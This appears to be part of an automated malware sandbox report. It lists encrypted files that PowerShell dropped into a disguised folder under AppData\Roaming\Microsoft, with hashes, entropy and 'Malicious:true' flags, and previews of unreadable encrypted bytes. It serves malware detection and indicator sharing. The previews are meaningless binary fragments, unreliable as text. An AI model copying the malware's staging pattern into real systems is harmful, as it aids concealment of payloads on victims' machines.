                                                                                                    SSDEEP:3072:YZvSMGW7+q8eStXY3nEplekfmKi6X6gCB6xSX:Ycup54QglekfmUKjQ8
                                                                                                    MD5:F395EDE54D746103EB07F0D7B2AAC7C7
                                                                                                    SHA1:CB199FEE1D7F5918A7B7C34BF8B50857826370B5
                                                                                                    SHA-256:D4F897CCD3958FE28F5589F715877D38C5837C58D9E4AD84B79A9C03B01E8820
                                                                                                    SHA-512:FF93D111AD8FCA86139960C0F2CCAACB2469BCA42DE3D68DD9387E288E970B1A8EFDA3B2BDC5820CE9AEB2579BBE36561DB8EEE494A5A77D6AEF98A0FAA133EA
                                                                                                    Malicious:true
                                                                                                    Preview: ...C.b...b+.}k.#.....(.o..z.O.......{.$.C......K.v.}Y...D.......V...u..8.X.e&.VO...z.6.gUF.M.....k.BX]z.. ;.#.J.Z.8.I. w@./CG .{......D"^.|..Dv.....G..e...KP...).N.1.b..C.o$..K...c...;.I....||.&(.P#[,....@?.O.....R_H.~A..?5....#.ot..I.1*r..Y,~...p.......N....vG+..........7.......X.C<..0...$..|-.^TL.g!.:..c;.....9.`..du...1.B..X.....{....).....vCE-.S.XYg.......D.+Ml_..LLN....,.DV{6....OA.AO..P._K...19.....+|..aBne.....i:..G....j.J.C....#..l....YV.-.......)d...*..q!f....5.C...mb(.W.....O........o8.g..#...!.].a....utm.7vP..*... \5rtt9._3...H.:...e...|......K....\z...A.....f..M...`kT..mU.._.F...7 .N......=|...3.V.e.-.7..R-.._T...sl.K=.o..b.).,"...w?....C..4..'..A.p..^^..........?...U..xD;.;:D.Wl......o:A@...w.-...[/.`...M.n...`..r....vU.Zvl....SA..=.I...j...z.,ms#^.......x...`GE6dWs(g....l...WUL...F.c.C.Xj.tk`tDF..K.....P.e..>4.vR..M...O`..p..,.{.Z.-N.a.....,.....T...flE...1.9.;...H..7.....(.).=c..C....Q..i..ep...'...+_........u...5...<...b.YyU.|.....:.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pvqeMSzPZs.tKjEShlWDUXs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95080
                                                                                                    Entropy (8bit):7.998041757996783
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:5GvPzEeIxyr6Wm1mwVk3haKO8YCl0axJWOSGiBPUOljJTysBze77MbXLhxIEkIMn:yoLKKsh/YCl08WO8BhjJ2sBq77mjIN5N
                                                                                                    MD5:AE64BA348E7FFD09E4E1B321D5773EEC
                                                                                                    SHA1:253588B5A684ED270E6E65CC184B5176A2039069
                                                                                                    SHA-256:D4C405EBC87D64D4F8EDB17A936C78BEDFBDC9554C951AAFC854D1AD92AC0EE3
                                                                                                    SHA-512:A7D4574C9102392C819393BE235F9D2E954C967A30C717A8953BDD7939A09DC43DC64318EC506ED102677A93748235B81F64A610C8A2EB9A79A2256056663758
                                                                                                    Malicious:true
                                                                                                    Preview: .g..Z.9}.....Z.cUx.0.......h6..N.N.....1....8.2v..K.......:Qm......frj.t.I.....D6.V..V..K.Ev..0....#...Ml.u.&......)~.k....$K|T...%.}uj.. ,...%..s.|..g....)!ZR\.l.....!].j`.Ue.{..R?o......]...9......3R...H.z........SA^.^..<.,....NI5..p........."F..>...v...).\.o..d{.K..%..{......25..5$$.|..Z.s4b..Jz.]........9..2/V.}.K...A..c[.Z.n.L*S.....X:6...Os.]...O...)[...S..,.......J.0F.......n6...1.G\[?M.."..y...+&.9..t#...t..Ga.._Vq.S.........C.......9yc.D0,o...0.....$|&_...1....(......p.hj}s.n[...W....T.G..R..&..R?.}_..._...}'.F.4.. ..r}....l..^.62cS%')~;.p.q@p..2K9..Z%.h........d.....6.(........+P..H...-..0...%8.".!157....(L.....o;.{.........F..W......'.X).L.Wo....4.$7,.....#4...^/..C+.H9....I....).....0.R....f.W.....=..5qV..U ....P...&...y.%..|.-......M.u..b.$.%.|..9.\*yLL..?..^..$.d...C0b......Gi>.:.q>.B[V1oaA..:.g1b.c+....._?........C..U...X.......$.....;D....l.`.a$#}..v,.h..e.W.....A.wPX._/....b.8_&."I.~.....~..:...}l..|"......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pwvaHtXxfPomRFi.lmrAWGwiSjMHc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85745
                                                                                                    Entropy (8bit):7.998248698849997
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:IgonWEorp/T59NuEvFKQXhNpO09NdI0vMBur9WXTJsPyfD0QTeDKREurwi:ILrGpTcrQXs+NdI7uA6K7mKF
                                                                                                    MD5:A4F0EF31B596F779B951AA7DEE4248A2
                                                                                                    SHA1:E5A386FA26C56C4D223315C053A15DBA0C8227E4
                                                                                                    SHA-256:EDDD8B2E379DFF1656B200DD4C4089A36732139C8AEBECC8187E5784562C4007
                                                                                                    SHA-512:6A014AB74974F3166F1D43F4302A0DA303E12C9EB5C4FE94D32572F33CD09985FE5785885603FE6AB0D44E0D1E5CCEC6AB4A9218B09023BF683F03C997AC6E59
                                                                                                    Malicious:true
                                                                                                    Preview: |..J.......g..!,V...n".*.n......aH...=..^~..-0D.+.Z.m..RR....o.!...VF.0A.6.m.@Q~..#.~s...a.7..A..nLqX.-_..7.Se..r..KH.L..>...QB..~F......'e..!....|....!Ci../e.B...?.f^.U =.e.z.hv.v3?.D........a|..U..l.m..o...... .f.......^...j......8.Q.A......R.....S...'%......N4...[M...n....T..K.jmL.*Y....K.w.|.D.z..}N.2.).x.h...........D.{.4.Vb.....'..Ab...$.............."........?.\.Ja...B."...,..p..O@.K4.07...o..X.v......t.f.._.i.2.d[........6....y9Q...s7@...b.......s......t..kg./...Q@q.ha....JO.c....b.....G..x.....O ..Ec.e..*...o.)fY.<,.3 rqg.U.]\+....M..?......jn0.!n#.....W...L.....Z...g`^....;..?v.y.lY.3.RR.q]@.9B.6..ik.).......X...Mr2-M./.B.E....(~..zB.'A.AV..."x....+:VO<n.*s."J/.w../.....(..P.)(.^Sl.*.65.U*4.....#..'L.'h.l.........)V....X...h.....+....H.=.;94...qv.2.z...}..qEe..1......'.P$..<Z..7y...4 /7.@.DE.L.T..+.R....,U.+R.u[.W.ok........M)wM.^.T.w......cZ.\}.\(lP......(F'...S....4.-..c>/Y...C...x..6[?...Xw..o."+.WK...}.5....%9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qUbmiKZveG.gjMlKXVyDWGFETUJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):199787
                                                                                                    Entropy (8bit):7.999054871395969
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:46/mX8L6xADibdTMheyZKZMbw1MK+QZqKa8U+eM4BKAqdNReAoYaw0vz7xYPlyBv:nL3SAlZDIqKk+3NrUzUneP
                                                                                                    MD5:13935D004DE950124471672180CC0DFC
                                                                                                    SHA1:897A4494EFB6543F526922EE7287217B3E75B7B5
                                                                                                    SHA-256:8184BC2550C980F1C7D953F63A24DFBEAA7E27CFFDA9292E5529B9C549DACC9D
                                                                                                    SHA-512:65E054C0047F4046CB2B2047461416011D08DE651E2444F0D936D48E77CF2E67970A4A9057C2549847BA4199E4D15335F30149A1BEEB1DC39DE685444D273B94
                                                                                                    Malicious:true
                                                                                                    Preview: ...e.qc[....{I....8....Ak.j..G...XQ...J...}@.w.(Lc......>.......h.|.7-..#4B.[..Aq....>.hf-.n....{...,..A....FI'.-x...)o.A..>.8?u.@....B....I.;F..|L.g.b!D.bxc0..db!`.>...Q."l..z.)B..C.i..Rt.{.6....]..%.J.Fj...}....,d.$..?Oh....A.......N.T...'....e.s.f;.."....B.o.....m....qm;6[.!NZ..LF+.{0U...7......EmP...W.OM1!e.)A.m..O<..3..64...\T.HA.4{......rs...D$....x.%.!i..{......87$r[..pzv(o.e.U..~....wr,cd.`t,.....8.....P...=.nh.b7.*....9.q.....Z.sp^PI.dc.y.%z......j68~..M.Nj.F........-..... .2..y9<7.[]`...+.B4.....J..e..p../.i..........[l..L .z..^.4.zz..bJ....(.?9..k(A^V...rO7P.....<9<....._w..v.ZyqE5..-.k....gL...K....u..k...3.o..>..p....l.}....-.*.Z.i.*j6.Ug2.5../....H........."..7EI.|...w..Y6......".T.R.l.a..m9?.TM..v..@^...j=.o`......3....w.E.J8.B..si.{$gC.4q.d...gv.y.X..:.......q...ET..`....l^.0...#.]La..,.U.h..iv........{..JA.M2.....`....,./...@....M.Et........]....:?..>.PL..U..Ib.T.XX.W!G..%....'....ZsY#.).3..bB..tQ.....9.z..-i5../...41.k..6g`.;.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qgNuTbxloWIeDXCrt.lzPMosrtYxFwCTdD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):134436
                                                                                                    Entropy (8bit):7.998675632195011
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:SN6F/astw79Kk2v7F8SGHnusxSOr6ArNuB8f0SiR3:Sa/astw7UbFZgG5v9
                                                                                                    MD5:FA2EB551711C26D3006283E3B56FEB94
                                                                                                    SHA1:DD95E9589B392CAA054EC770DB2A4B77F7D2C2B9
                                                                                                    SHA-256:F9B00B2E7911F2BB9FA0B7DC4149CBEAF08F1756268813AA2B45994D6B7330DF
                                                                                                    SHA-512:651478F3F2A14CCFB48688DF0C2EE4997D8CE9913E3BD695A38C8FA69135B4FC7C0D8CCF74528CCC359F5CF03094678EDD60FB896BA90D9CCE82AF81B9E5F625
                                                                                                    Malicious:true
                                                                                                    Preview: .sJ_.C0ls...r.....Z..O.eE...SS..|...b.<./..".k.,c...".h..A'}. aU...oEO....FB^+..&....H%}.....b...`A..6..e.!...v|.1..k..J.......v..P.?...j3....:5.d..ga...I...u.=,0.%..V..F.F........`#... ..<..!....x*..d....2F.1.as7..Gr....t.Rm.=k.m........J..........I*..0.....x.1....z.ib...Z.-..QF.......n.[...]......o.'..@....'.W........J...H.9.C]wj...#.^s..j.+.Nu...G.x.d.Q...j.'.>...PM......h........d:..VQ..(.....d_.*.....!W....s21.kXAAd...r...4...........(t...._....<.(U.m..%...r...O.......7.....,d.*...'F.4..t.+e..*I.c..#`Q.v3JH@.p.ZF.w.37..H.N..9V?Rxt...Ic^..\,.<. *.Es./..........v..V`..v$.5..MY.|T..H......@.h#...A.._;.MW Ry(.R..<M.c.^.82.....0.`...ld=J..{..0....H...v.R-.'o.Y".....[.......0yl..E.....1.3?...;}Y...B4*._.}...!.31.Dy:...y.'.#.<.....L....KM.B.....@.....'.<..<.@....+.}.)....b7...........%.b.>L...\.._.eD.QlbF.F..C.........te3.........1.L_Y.+.....{d......./.6.4...?..-McLa9}..._......?.*q.)..H..o=.N..z..,."B..V.....}.V#.7.........._bp'.g....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qtvATYdjXSFIy.HCenubryVZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):115032
                                                                                                    Entropy (8bit):7.998499083707013
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qMYGsaFmJ+DsTFg7DopHHuc/JLlhuVb/QFX1r+:i5aFmJWaFg7DoFHuoc/QFlK
                                                                                                    MD5:CED700302D6FE6111D4DA7A0B6915C22
                                                                                                    SHA1:5ED0F4B26C084DCDD6A2EAA7D59190B70862AAED
                                                                                                    SHA-256:BF5E0E6CA40707001542DF4627E2A7C408B133439B2B510848B33BF315733EBA
                                                                                                    SHA-512:20AB753E5C46F467249C75214636F41050F60CC66C62CDBFBBE5D6B2714820B28A32DC842141DC2448055806CBB4B61195CBE303570D0FBEBDF5DAD71B3C8206
                                                                                                    Malicious:true
                                                                                                    Preview: .L\D.....U..Z;E.\...b.mG.E).....RT.....L,:.B....J.\@^..7@f..>.7....k..99.q3..7e?..7F+..u..|..E.fk..{@hS"*.om..uI...T..{..d.5..9....Ae...k....t...T.zm..%.#.7.Zh.5fYt..3..L......./.....z.B..........!.}!..t...9E.8.v.B.[d..@0sO..W.V....Ax....&...e.r...\.0.=....?.W.*.5T@.U..K.Z..ct.|.P....`.V.cw.~.;4=.....e.......OCf.VL.0.....g......%.d._xV..K^..49...b.......b...v.k.;..{..8..S..#w..."...Rzy"6.>.U.}...`.~.g@.=~.;MXhH2...Y...E..6.JM..7.=-E...;....-_"......>9L....0.Y. ...?........*.K'<...S....l..Hs.^Hn|T..%_8..6........i.....F2..}rZ/R....k...4..FH...}....G....|...}^.s...S....D..I....:......-.m.....[..J.f...A..T.. C.........vY..*.EE.p.j....S.gQ...\p.M.N..x.P.@x~f.Z..%#.wa.Tj.....z....M.......|....O.a8....VI.......z.....1..^.y..vFr...a.\.Y.........m.Z.>.f....~u..@......1.z.u.^./...W.x..~.4.@...@...l..?u(..;..!.d7..P..1.........5...8....Kfc.-.........w"E.7..4.......oV=KG.V.....F.r....SD^.....vy9.~......._.!..). *..>..*..H0*.o2.4\...W...S=....xL..KU.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qwNzstjZcGXUn.xSqkTQWuKelAaUpHJL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120394
                                                                                                    Entropy (8bit):7.9985356210796175
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WU5K3Iavi4bvio6k6trHPQaEEGunnS6m2PUHRac0w2kNAIN:PlN4uo6k6tzQcGudUHKrcR
                                                                                                    MD5:0E0C2A74C9E4A1D089ABB4BF2DD61E24
                                                                                                    SHA1:E11BBCED3A8C91D7929DA7F9540ABD3E30E3D9F2
                                                                                                    SHA-256:47C4BC6A2E9C7E4062737580D840A65FE45B7DB02CDB355E36561F576A2CECA2
                                                                                                    SHA-512:F6F3654D7172B9FA46878CB0AE27DAAE275B54571225C7EE99A9C686525F4D4D19C2A59D2DB661833D0DC106F980AF6F3496C2E8F01F72BFE4580B5006DC2569
                                                                                                    Malicious:true
                                                                                                    Preview: ~(..l.....v...ay.6..'....1.X...P!..J.].q..]...n.G.L.U.......)."Y..e.......;q:T..%.KM..'.....G@..0...#..r..i.DoQ ....y.=..b.P.8Oqm.P....W.(%.....7.C....8s.F.P",..S/;......0Q...........uR.]L.A.......K...@.r.f....O.F.h...".GjyvU..$.{b......id4f....<.2b}.....Q.u..I.6......[....:.>.-....9.\..Q........%f...6.p;y.....:5n.. rh.... I. z...C...j...o..4E.&ktF.r.U.W.O.nd.U...`...... ......x.E......h..9RNZo....._4..Hsc....[`...P..'.H:.4.4u.q..Kf...}..G...z.E..,.y.z.../.......4P%.AI..d.B...a.m^....M.v'..2......p...0..us.d.l.\6G=.2.g.s......).vu.s.....U....Xw.X.....2.....r.;..d..p\.i.*..p...&./.$~..`4]..8........Zcf...2z.9y.#.w..b<..~.G..d].;......d......Lc74....[...~.m..F.=..o.....;...#-m+-)....y..AE.3.-..~.!^.1.n@...PcA....T.A....T....7...'.8......)Y.#*s.0...g.V}46u..&.TbE...\.Ps..E....+...BLj;..l...L.....W.).4.l.8.?.Ei.8y...UM.3?.t.a@......z.nO....z.f."....@].....~.E.u'.3...Q..J...>.M.@=s...+..E}..S.2.^U..&R.d<2P...C4....:ir..?.f...Q....!..O
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qxtIbnfPeB.DpThtgjOiluaEeRsnUc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):189660
                                                                                                    Entropy (8bit):7.999030186453763
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1FqVjSnt1+L243v8PV9ZyrkqmB4PcW3Lh3NuR3plRPU9nax8vT4JYqtlGJvx:3QjaQqev8P9yrlmePcWbdNu1+9nv4JYH
                                                                                                    MD5:B30023B55B1BD0982EB503002B45D7F0
                                                                                                    SHA1:BF55B449A41E00BC1012359F1982733E88C28947
                                                                                                    SHA-256:DA3F3AA6F99795B8B4DA9A3E7DF03081B9E45AE73D40101DB805B28EB622BB0E
                                                                                                    SHA-512:B768D563E3936A3CF1ADBF9FA444C21A4512A417E2D0C27E99ADB256F00E792330201B72AAF025EECC8902DF7060B27F876FF5C1B3462460842452AFF4DBA432
                                                                                                    Malicious:true
                                                                                                    Preview: Z/....m....8.B.)_..,....{w8...L.k..t.g...2...s.t.ZV.re..;/h.p..... ......N.]\...w.6.j.8n.3>a..<..S.>..v`\...n-~...a.........(........Z.\0.4Ci....H.%.3....z..T..%AWRX.;..XI@<.]~..!..O.5.T..+).w..n.(....@...p.'..%e..8."J.)Z..x....V.\...........z.L.....V........J/...L...x.wi.....l..P..J/....z.yuhq.^..b......v.....d.<...4......m..@.....]5.\.9../...5.A.[....8.f[.u.....a..OX%...pU;?.....%X..H.$.4z..YZ........<:E-.-[..;...o.3:..\....b...T.q..........h.c..)h...2L.._..P.N....c.T{@.>.....j....z..w...s.Yn....E(.@.;...tB.v.m.i$......zWoY}.ax.....>.0.q='N.`..z&..Z.@...@*..S......U.....`,...x.:.Q....Zo.\.X..@m.->f.W.^v...nh..6.....v.9..b.7.iQ_.C.!..V.e.6..ih..W.Kq.....z'=....KC.....].'.s...?.M.K.y..G.|w.wI..b&..l.C../@T....F..y.............0...&......y._.......6&..2qo..,...>.DR..#L@.=d.o.....&[..a.. .... JLZ.o.....`..... M.ul..H...y.Z..N..S/...........a...k.ipU..|xJ....&g..7.....x..5..f.!.8....]].y|.~.X.x.."b.y.....C.r......E<.3..v9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qyOtVvYHfEwSkJiaZ.NWtnorOhiL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177019
                                                                                                    Entropy (8bit):7.998962797166125
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:jSP0+RXbIlV0UgiDYE0FGg+6C8rI64KE+mhYYNTcxku0Ar/jZy0bI4c8eHbSI0:23Xb6WFcYap64L+mhD9zITVykIw0/0
                                                                                                    MD5:0DB1666E5FE881F9DEAB9F56095AD820
                                                                                                    SHA1:9E51EE96CECE431DAF4386A591B4E6B1B50D3897
                                                                                                    SHA-256:AB6F2E8CD83AC20B5C33C4E844D2A0C6E03536D5F84CA098A40EB53BEC75A1AC
                                                                                                    SHA-512:44A27FD087AE3AAD73F7DB19A0917B5A1E0B04BAC318C318CA6023E738F0350DF53E75F39F5FA582D8991172EB8B5E9F60E94C13B466B0225029FF48386C0664
                                                                                                    Malicious:true
                                                                                                    Preview: u#.to81.C.U..P..=N........z{.-]..\..k^..d.-..n....zgM.....m.Y'i.y..t.a.........G.p..F..o..ii.,...B.n...:..z....!C...-...:..............*....T.......Z..H..5.7..p.UW.L....^q.P^.!..n....C..;.q..$...U .n....A..`......e..W...b..U.kK@.....p...~.h ....G~W....j78C.....G......+..At...I_..p.Q.nb8.S.`.SFC5m.9...cm..._.....!iw`.......C!>.n=O&cJ.k.|Q}.A./.^2....W.....Y...%ZR.<..|.P.......a.W...z..1"V...b..!\>.X..^.7...s.E...Z..[.>K..X.|....".A{.:.CN..J..._..|..........J..y".J.i...Ot.9....Z7.G...3..4..W~...n.E..F..P.Y.\>F...i.o....]....;.Y......1}...S..j.......&WX...|.(...>n.<2....<.&....x....R.g)N....t.._....~....Xs.ll......BH..o.M+h......u..S.6....&....6.t."8,.)dx...uom..hc...aA.IPQ..:h.RL.H...\..yiO5....f.Q....'..{.D.. @...}pt.p.?............3.h.y*R5w2..E...).Z.B!..(..B..}~&............u....".g}.[{Q~..o.......9..<n{Z.....*G.....D.t.@N.W.p.W..D.?.+.u;Vt....(...u.m..:...$...[.........b...t./.r...m*..#=@Q..dC...gbG...d..0.x...".y......Z.v.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rGtdscfVKoPDvQblue.mvfCdFtcHr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):183980
                                                                                                    Entropy (8bit):7.999054969346551
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZbsCQFsOFxzS1Zu9RGNMHbv8Nrwa5s5NmJSy9+2lfY4NMK7T2AU6y94o5LhE1j:ZbsCAFMOqNSvbuaNgJ5Y4tWAPVo5VEx
                                                                                                    MD5:2649241492ECD017708DC5912EF55DFA
                                                                                                    SHA1:887F16FF8943FFCF905CB33E18747FF34A2A7978
                                                                                                    SHA-256:5662A3AEF6EA876E081ABAADE41F873994703E7FE5B55D4C4C3D327368EF36D3
                                                                                                    SHA-512:C5981119583910E7D2B70EFC278BD6BE6B754E238C81A1D99CEDF203547F5D712A38ADF0F91909732DC208875111645C5B903880994592E9CEC1EF9D6CD4549D
                                                                                                    Malicious:true
                                                                                                    Preview: b~...4#.G....}}..9N..Y..)...*..4/;.Y..2<......*...F.)....&..*_.....A.w.....z..D.....V..2.@p.......M..C./...=~}.w..%..z.....7x.i.+.moa:....m.s.Y9.r.....L.jp.........oTd.&..1.[......P4....Vy-f.\..J...i.....wq}.s6gp..n3.]...g..8..K5\..A.V.W.A}Jj...C........z....g2..../vj..w..A.`..........d...y....._3.d..9.i}..1.4.m..N~...b.}.).q.u.V......D........I..].|.r..........*.....F......Wb.-..U..."..h..rFT.{..cH.....T..f.v...X>..p...j.~O.j.UD`.}.....^..o...b x.....lO.9T.O2.</.Zo..v.M.....4.2{..<g.|.sS]3jaS.>.......@Os...f.....2y..g.3.M.Kdi........z'x;..X.U*......H...td...g$qh..x..Ra..........1..:.?(..t-.}3{..`,.r.#.C..|.n....w.K.9m....3.....+y._.t.Ib....-.?..X(&.U....N3q..W..5.7....'....Jg..z..v..z../.i:R. .....6.-c.Z...PSTQZd/]i.......)\..5d..Iw. ....y......#.A..M........P..w.<..O....Z......(+*.EH....zz.....&`...T7%@..5.'....>W...,:....+.+..y.k ...F..R..n...........}..E@ ..6..m......;."...`6[...#...Nr..\.r..^../5.A...../=...L.-.....Q.#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rOGQnvNyDXm.GYAkivKUFNltmefhy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):157004
                                                                                                    Entropy (8bit):7.99888956701865
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1QQgCgmES3Zy89qXxmwVvPlOdd2jk6n2978ROEG4x38KMTEIl4vgriC:iQHxRZy89qXxmGlOdd2jk6U80VKMTEID
                                                                                                    MD5:08B7C9D4E139862E030CFAF3EA698ACA
                                                                                                    SHA1:53177F32899BE616BDF8B691F616226ABA85A1C3
                                                                                                    SHA-256:241800C6F3CE4E64A367001B0303A2E34C5B454039475A9998CAD6FB0D0FDFBC
                                                                                                    SHA-512:AD0A796A660415C6DE80545D18FAEE0001AD4ACCB3C8EE0022C753A650B82B9F39C234064904712B3F0B3FEE64D43CEE4E51570EB84E748BC5259AAA145D644C
                                                                                                    Malicious:true
                                                                                                    Preview: ......D../.I.!.@.W..l.Z89n.Y.1..}g. }~....Z...Dn!.......[.u..........&`>..pn..r.:..."...h.....E.O.AX.l/....=....v...<. .6.eV..(..j...~.r...*.>..3.d...]7G6eJ0.q......6.7.q~....4s".....w..HC(.)i..)....,.XLTA.>1...{P.D...O..U...7.....xR"i...Q.6..D..C...8*...a.p.B......y..F....i.2Q...^..Zm.5...J6O.F._.7v.W....Ho.....ZU.J.w`..n.b."...o.....j...S..............;L..i*..SC~....uf..[2...X.x....yX`.aq.^.~L..|<...$....4.VQG.B.6.4 B...Z...Rq...{^V=m._q+.. }.j..D.\...<.&....u.|.E......w9]y.V[f...Y^......i.~...~.L2B.(.Z..j{?f...J".D%r........r...4..X=.<..UO....f..r&.q.4.......WY.......{.W}...E..,.tC@$.)p..]o..6..t.fj.#.....).i5tn...Ea....7[..1.C..QNBG.=....9.<Qr.....@..L3......L...#...*..g.Z*.>...w|.4.....H..&I ....A....,............&!....h...\.....~>.T.....9Q9`e........!.."W....[..."... .)o..{.....d....3.=S..F.U..........$.. ..DT......q....&.#...#jY..Ly...j#s.0.....5'..0. .2UM..1S...i..hf.%sb...c..}[..Y.e+.......;.4N_u.[.9?.YgF5.E..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rtMpcCmVYPUATdu.xCWtzoNIml
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102506
                                                                                                    Entropy (8bit):7.998233299874696
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fX2jbmJjRxPCiT9Lb5INx1XOoOQOufqFv4lanDPmSFTlX:fX8mJ36iTcxQoPOMq4WdBlX
                                                                                                    MD5:C318D8E70123F71DE99FADD81EDEE74E
                                                                                                    SHA1:90BF838B6A9A0D8F377196D68F175D2BA5E0896D
                                                                                                    SHA-256:338EE674EE431116BC190FAB70D6233D15C16DC96071C11E1F1C85B47A9ECF46
                                                                                                    SHA-512:D4321FB707E6DCD1573FB427B209EDD0AF0262567D7EE87AC791CAEFFA0703EBE20E06FB5629C23FBE7AB5B15217CD2C354304E44771A09CE38A3327EBA2FC60
                                                                                                    Malicious:true
                                                                                                    Preview: v....a.^....0f........`_.t:$.Nqf...)".r..X].....V....[.M.A.r..E.....#|..Q.....B.wBg..... ....w.N.N....\.<?.0'T{..yX.....E)..-..9..Z.;e..3.azk.7"...J.4+e.^.DZ{F..=..!....*.. z.^.....`n..?..M7...-F...6..h..D..%.z.6.....,..2z...K.......k.... Y....f&.O/...e..u..K....[.y.P.{.xv.6..%.].,.0t.b...........Gi..Z*..&>...7z$......d`R............T...x<C..... .5#.0.~..Z.O.'.TCk..P._.. C..2.=...n.......(2._Q.1.n....V.;.'......H......`...[=.m.,.[..E.O.^...%..kXb..P.....W{{&.B.:X..A.o}GI..a......F.(.|._..D..1..V..h..`.Y.....Q......hI...[u<.^.../T.....g...L..?.[....R...R.........~+..H.?F........A.T...v3i#...L..,.WT..............<..1.f.....m..{.2....*K...6.j.9M...c.@.,..q;.Bw..R........0....F.....J...3.w@...N.....c..#$*|..?.=O...<...8.RpL.~..`D...=.B...^....~Gb..F..DF.[L.0.mEF..gL.js...b..Q......v..A..].p......um...........?w+....(}.kvr.^L...g.aj....7*.'..]..Bk.L..L.o.e.HR.(....'#.N.R.D.....sF.lp.q8AGhz.rV.+....H[......d...Y..=U..O.wp....5d..Tq...hA.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rxgqSYbFXufO.gRWDMzZTNHrxBnQGU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):168779
                                                                                                    Entropy (8bit):7.998901656515977
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VB/A8E/LjY/Is7MUuxhXVuVOlJgbxU35Aa8tvVEvA2NJmNhDDMrGSJIJ://AH/LVVvqb2ya4VETTEh0rGSJM
                                                                                                    MD5:9FF7F39E46A1BB3D85F2EA029614ACEF
                                                                                                    SHA1:166073443BBC4C5374EB97B10453567D0BB24B15
                                                                                                    SHA-256:C2CE11825D8D89FB758FE942E556BB12243860DA1A2CE005C1C59EED843D2CFE
                                                                                                    SHA-512:A7677F8CBD02504D9288580F482E22C4A5847486E70540D266285919C64EB539F8E4ECB821F93D7D68FBA544A106CF042C48BA1F15047F1935C58BC7E8845FFE
                                                                                                    Malicious:true
                                                                                                    Preview: ~.c. ..TO.;k...E..@T..-..I.d....6.G.......;.Q!B.{.C.*........M..B5oK..)..~G..(S.)A.P.~.%....<BfC.....w.......bk.#.6.).#U......Hnv[.\..8`../.D.....0Q..r^.!.x..*j7 .....;..;rR.......[.{...s.I....$1u.S...*......^`.Q.?.5'q.....E..F....g_Q1.#..a.(.....N[?.,..?t}I$..v/b..S.>........l.T.^#:...t..r5.r.2..-..|OCQ.."}....f..>l.........##...?.D......oB.R?.&...F.9-......y."..^.d.@.[.[R....)k..._.=...>..@K..c../g.sVe.YcV..+..#v.E.vo..'....<.;VP..o..@L.W.9.=t..o.5.>.Q.qh...d..l..`.*.=...%R3.f..y1).p.e.?. ya...w..... .4.CXp$....N...P:...uT8.04.......<."T.l".u.|..vZ........#.H^..'....?.<.S.......)+...].@..0.$.......6A.7.W.8..k.M4..f.;."....../B..$...$.<.3.#..v...PR..{.7..V......`A...a5....FA.....F..q.]..=S.l./.vN..r.qf....=....gj.bXg.{.U....I6.X..V.......=s.z.....]..uy.c..j.r.y.DS..m.Y..=.....N.......B..H;q..Z..c....T...8.<P...6.U..csh NO../r*.~.l1.o.)H.N`.|U......$......h..p..R.J0.........l%C..G|<.j.N.....)kW.....Y..KgB..Y.,!..m.h{uO:...yX6..C....L|
